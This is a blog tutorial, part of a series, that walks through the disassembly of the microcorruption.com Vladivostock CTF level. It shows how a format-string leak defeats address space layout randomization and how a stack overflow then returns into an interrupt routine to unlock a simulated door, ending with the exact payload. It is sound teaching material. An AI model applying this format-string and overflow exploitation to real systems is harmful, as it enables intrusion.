Fun with Assembly 15: Address space layout randomization

Posted by Hywel Carver on September 1, 2015

This is the fifteenth in a series. You might want to read the previous post before reading this.

This post is based on the Vladivostock level on microcorruption.com. Like last time, we’re trying to find an input to open a lock without knowing the correct password, using knowledge of assembly language.

First steps

In this level, we’re going to be dealing with address space layout randomization. The idea is that nothing in memory has a predictable address (including the executable, libraries, heap and stack). This makes it harder to exploit, because the exploits we’d want to use will almost always depend on specific memory addresses.

4438 <main>
4438:  b012 1c4a      call  #0x4a1c <rand>
443c:  0b4f           mov r15, r11
443e:  3bf0 fe7f      and #0x7ffe, r11
4442:  3b50 0060      add #0x6000, r11

Create a random even number between 0x6000 and 0xdffe in r11.

444c:  3012 0010      push  #0x1000
4450:  3012 0044      push  #0x4400 <__init_stack>
4454:  0b12           push  r11
4456:  b012 e849      call  #0x49e8 <_memcpy>
445a:  3150 0600      add #0x6, sp

Copy 4096 bytes from the code segment to r11.

4446:  b012 1c4a      call  #0x4a1c <rand>
4460:  3ff0 fe0f      and #0xffe, r15
4464:  0e4b           mov r11, r14
4466:  0e8f           sub r15, r14
4468:  3e50 00ff      add #0xff00, r14

Create a random even number below 0xffe. Subtract that from the new top of the code segment, then subtract another 0x100, stored inr14.

446c:  0d4b           mov r11, r13
446e:  3d50 5c03      add #0x35c, r13
4472:  014e           mov r14, sp
4474:  0f4b           mov r11, r15
4476:  8d12           call  r13

Call the function that was originally at 0x4400 + 0x35c (which is aslr_main) with a pointer to the top of the new randomized code section. But first, we set the stack pointer to be the randommized value in r14.

475c <aslr_main>
475c:  0e4f           mov r15, r14
475e:  3e50 8200      add #0x82, r14
4762:  8e12           call  r14

This calls the function 0x82 bytes into the code section, which would originally have been at 0x4482. That’s the function _aslr_main.

Delving deeper

The _aslr_main function is pretty long. That’s because the function can’t store things anything at specific addresses, because of the use of ASLR.

4482 <_aslr_main>
4482:  0b12           push  r11
4484:  0a12           push  r10
4486:  3182           sub #0x8, sp
...
4754:  3152           add #0x8, sp
4756:  3a41           pop r10
4758:  3b41           pop r11
475a:  3041           ret

Preserve some registers from the calling function, and add 8 bytes to the stack, which are all then reversed at the end.

4488:  0c4f           mov r15, r12
448a:  3c50 6a03      add #0x36a, r12
448e:  814c 0200      mov r12, 0x2(sp)

r15 still has the start of the randomized code section, so the function pointed to by r12 would be the one that started out at 0x4400 + 0x36a, which is printf. That address gets saved onto the stack at 0x2(sp).

4492:  0e43           clr r14
4494:  ce43 0044      mov.b #0x0, 0x4400(r14)
4498:  1e53           inc r14
449a:  3e90 0010      cmp #0x1000, r14
449e:  fa23           jne #0x4494 <_aslr_main+0x12>

Sets every byte from 0x4400 to 0x5400 to 0x0.

44a0:  f240 5500 0224 mov.b #0x55, &0x2402
44a6:  f240 7300 0324 mov.b #0x73, &0x2403
44ac:  f240 6500 0424 mov.b #0x65, &0x2404
44b2:  f240 7200 0524 mov.b #0x72, &0x2405
44b8:  f240 6e00 0624 mov.b #0x6e, &0x2406
44be:  f240 6100 0724 mov.b #0x61, &0x2407
44c4:  f240 6d00 0824 mov.b #0x6d, &0x2408
44ca:  f240 6500 0924 mov.b #0x65, &0x2409
44d0:  f240 2000 0a24 mov.b #0x20, &0x240a
44d6:  f240 2800 0b24 mov.b #0x28, &0x240b
44dc:  f240 3800 0c24 mov.b #0x38, &0x240c
44e2:  f240 2000 0d24 mov.b #0x20, &0x240d
44e8:  f240 6300 0e24 mov.b #0x63, &0x240e
44ee:  f240 6800 0f24 mov.b #0x68, &0x240f
44f4:  f240 6100 1024 mov.b #0x61, &0x2410
44fa:  f240 7200 1124 mov.b #0x72, &0x2411
4500:  f240 2000 1224 mov.b #0x20, &0x2412
4506:  f240 6d00 1324 mov.b #0x6d, &0x2413
450c:  f240 6100 1424 mov.b #0x61, &0x2414
4512:  f240 7800 1524 mov.b #0x78, &0x2415
4518:  f240 2900 1624 mov.b #0x29, &0x2416
451e:  f240 3a00 1724 mov.b #0x3a, &0x2417
4524:  c243 1824      mov.b #0x0, &0x2418

Insert the string “Username (8 char max):” at 0x2402. This has to be done dynamically because of the randomization of the address space.

4528:  b240 1700 0024 mov #0x17, &0x2400

Move the byte 0x17 to 0x2400. It’s not clear why at the moment, but it’s probably no coincidence that this value (= 23) is the length of the string, including its null byte at the end.

452e:  3e40 0224      mov #0x2402, r14
4532:  0b43           clr r11
4534:  103c           jmp #0x4556 <_aslr_main+0xd4>
4536:  1e53           inc r14
4538:  8d11           sxt r13
453a:  0b12           push  r11
453c:  0d12           push  r13
453e:  0b12           push  r11
4540:  0012           push  pc
4542:  0212           push  sr
4544:  0f4b           mov r11, r15
4546:  8f10           swpb  r15
4548:  024f           mov r15, sr
454a:  32d0 0080      bis #0x8000, sr
454e:  b012 1000      call  #0x10
4552:  3241           pop sr
4554:  3152           add #0x8, sp
4556:  6d4e           mov.b @r14, r13
4558:  4d93           tst.b r13
455a:  ed23           jnz #0x4536 <_aslr_main+0xb4>
455c:  0e43           clr r14
455e:  3d40 0a00      mov #0xa, r13
4562:  0e12           push  r14
4564:  0d12           push  r13
4566:  0e12           push  r14
4568:  0012           push  pc
456a:  0212           push  sr
456c:  0f4e           mov r14, r15
456e:  8f10           swpb  r15
4570:  024f           mov r15, sr
4572:  32d0 0080      bis #0x8000, sr
4576:  b012 1000      call  #0x10
457a:  3241           pop sr
457c:  3152           add #0x8, sp

This looks complicated, but it’s actually just the puts function, with 0x2402 as the argument. So this is just going to output the string above. The process of embedding the code for one function inside another is normally called “inlining”.

457e:  3d50 3400      add #0x34, r13

This will make r13 be 0x3e, the ASCII code for “>” (the previous value in there was 0xa);

4582:  0e12           push  r14
4584:  0d12           push  r13
4586:  0e12           push  r14
4588:  0012           push  pc
458a:  0212           push  sr
458c:  0f4e           mov r14, r15
458e:  8f10           swpb  r15
4590:  024f           mov r15, sr
4592:  32d0 0080      bis #0x8000, sr
4596:  b012 1000      call  #0x10
459a:  3241           pop sr
459c:  3152           add #0x8, sp
459e:  0e12           push  r14
45a0:  0d12           push  r13
45a2:  0e12           push  r14
45a4:  0012           push  pc
45a6:  0212           push  sr
45a8:  0f4e           mov r14, r15
45aa:  8f10           swpb  r15
45ac:  024f           mov r15, sr
45ae:  32d0 0080      bis #0x8000, sr
45b2:  b012 1000      call  #0x10
45b6:  3241           pop sr
45b8:  3152           add #0x8, sp

This is putchar written twice, inlined. So we print “»” to the screen, to prompt for the password.

45ba:  3a42           mov #0x8, r10
45bc:  3b40 2624      mov #0x2426, r11
45c0:  2d43           mov #0x2, r13
45c2:  0a12           push  r10
45c4:  0b12           push  r11
45c6:  0d12           push  r13
45c8:  0012           push  pc
45ca:  0212           push  sr
45cc:  0f4d           mov r13, r15
45ce:  8f10           swpb  r15
45d0:  024f           mov r15, sr
45d2:  32d0 0080      bis #0x8000, sr
45d6:  b012 1000      call  #0x10
45da:  3241           pop sr
45dc:  3152           add #0x8, sp

This is getsn inlined, for input of 0x8 bytes to be stored at 0x2426 (in r11).

45de:  c24e 2e24      mov.b r14, &0x242e

Set a null byte after the 8 bytes of the input string.

45e2:  0b12           push  r11
45e4:  8c12           call  r12

This calls printf (remember: its address was stored in r12) and passes the input string. This is very helpful for us to form an exploit. You might remember from before level: printf has helpful flags that we can include in our input to perform operations the programmers didn’t intend.

Those flags include %s for printing a string, %x for printing an unsigned integer in base16, %c for printing a character and %n for writing out the number of bytes written so far to an address in memory.

The arguments that printf uses to calculate these flags are the next values down on the stack. In this case, the things most recently pushed to the stack are the status register and the program counter.

That last one is very useful to us - if we know the value of the program counter at the point when it was pushed to the stack, we can work out where the address space has been randomly moved to, which means we can get round all of the protection of address space layout randomization.

By entering a username of “%x%x”, we will be able to extract some addresses from the output - playing around with this shows that the second address is the address of the printf. Before the code section was moved to a random location, that value would have been at 0x476a so by comparing the two, we get the distance moved by the ASLR.

We could have worked out that the second address was printf. At the start of the _aslr_main function, r12 was written to 0x2(sp), and as we saw at the time, r12 pointed to printf.

45e6:  2153           incd  sp
45e8:  0f4b           mov r11, r15
45ea:  033c           jmp #0x45f2 <_aslr_main+0x170>
45ec:  cf43 0000      mov.b #0x0, 0x0(r15)
45f0:  1f53           inc r15
45f2:  3f90 3224      cmp #0x2432, r15
45f6:  fa23           jne #0x45ec <_aslr_main+0x16a>

Nullify all the bytes from 0x2426 to 0x2432. This will overwrite the username just entered - presumably only the password is actually needed for the lock.

45f8:  f240 0a00 0224 mov.b #0xa, &0x2402
45fe:  f240 5000 0324 mov.b #0x50, &0x2403
4604:  f240 6100 0424 mov.b #0x61, &0x2404
460a:  f240 7300 0524 mov.b #0x73, &0x2405
4610:  f240 7300 0624 mov.b #0x73, &0x2406
4616:  f240 7700 0724 mov.b #0x77, &0x2407
461c:  f240 6f00 0824 mov.b #0x6f, &0x2408
4622:  f240 7200 0924 mov.b #0x72, &0x2409
4628:  f240 6400 0a24 mov.b #0x64, &0x240a
462e:  f240 3a00 0b24 mov.b #0x3a, &0x240b
4634:  c243 0c24      mov.b #0x0, &0x240c

Move the string “\nPassword:” to 0x2402.

4638:  3e40 0224      mov #0x2402, r14
463c:  0c43           clr r12
463e:  103c           jmp #0x4660 <_aslr_main+0x1de>
4640:  1e53           inc r14
4642:  8d11           sxt r13
4644:  0c12           push  r12
4646:  0d12           push  r13
4648:  0c12           push  r12
464a:  0012           push  pc
464c:  0212           push  sr
464e:  0f4c           mov r12, r15
4650:  8f10           swpb  r15
4652:  024f           mov r15, sr
4654:  32d0 0080      bis #0x8000, sr
4658:  b012 1000      call  #0x10
465c:  3241           pop sr
465e:  3152           add #0x8, sp
4660:  6d4e           mov.b @r14, r13
4662:  4d93           tst.b r13
4664:  ed23           jnz #0x4640 <_aslr_main+0x1be>
4666:  0e43           clr r14
4668:  3d40 0a00      mov #0xa, r13
466c:  0e12           push  r14
466e:  0d12           push  r13
4670:  0e12           push  r14
4672:  0012           push  pc
4674:  0212           push  sr
4676:  0f4e           mov r14, r15
4678:  8f10           swpb  r15
467a:  024f           mov r15, sr
467c:  32d0 0080      bis #0x8000, sr
4680:  b012 1000      call  #0x10
4684:  3241           pop sr
4686:  3152           add #0x8, sp

This is puts, inlined with an argument of 0x2402, so that the string “\nPassword:” is printed to the console.

4688:  0b41           mov sp, r11
468a:  2b52           add #0x4, r11
468c:  3c40 1400      mov #0x14, r12
4690:  2d43           mov #0x2, r13
4692:  0c12           push  r12
4694:  0b12           push  r11
4696:  0d12           push  r13
4698:  0012           push  pc
469a:  0212           push  sr
469c:  0f4d           mov r13, r15
469e:  8f10           swpb  r15
46a0:  024f           mov r15, sr
46a2:  32d0 0080      bis #0x8000, sr
46a6:  b012 1000      call  #0x10
46aa:  3241           pop sr
46ac:  3152           add #0x8, sp

This is the gets function, inlined, writing up to 0x14 (= 20) bytes, 4 bytes into the stack. The fact that this is written to the stack is crucial - it means we can overflow the current stack frame, and overwrite the return address of the function.

At this point, the stack looks something like <8 bytes of frame><2 bytes of stored register><2 bytes of stored register><2 bytes of return address>. If we start writing 4 bytes into that, then we need 8 bytes of filler content, before writing over the return address.

Unfortunately, there’s no unlock_door function for us to drop into. What the unlock_door function actually does is to use an interrupt with an argument of 0x7f. Maybe we can do that instead.

When we return into the function, its argument will be the next 2 bytes on the stack - which we can also write to, after overwriting the return address!

So this gives us our exploit. The code has a stack-based interrupt function, _INT, at the address 0x48ec, which we can use. Our input to the username will tell us the new address of the printf function which used to be at 0x476a. That means if we take that new address and add on 0x182, we should get to the new address of 0x48ec (0x48ec - 0x476a = 0x182).

If we then append 0x7f7f7f, we should be able to pass 0x7f as an argument to _INT (_INT takes its argument as 0x2(sp) which is why we need two bytes of filler in the argument here).

As an example, first I enter %x%x as the username, and get the output 0000cf50. That means printf is now found at 0xcf50. Adding 0x182 get us to 0xd0d2 as the location for the _INT function. So my password become 8 bytes of filler, then 0xd2d0 then 0x7f7f7f.

0x4141414141414141d2d07f7f7f

The door springs open

The randomization of the ASLR does make this much harder to debug, right up until you can reliably extract the address of any single byte. Once you can do that the ASLR is broken, and you can use any exploit you would have been able to do without ASLR.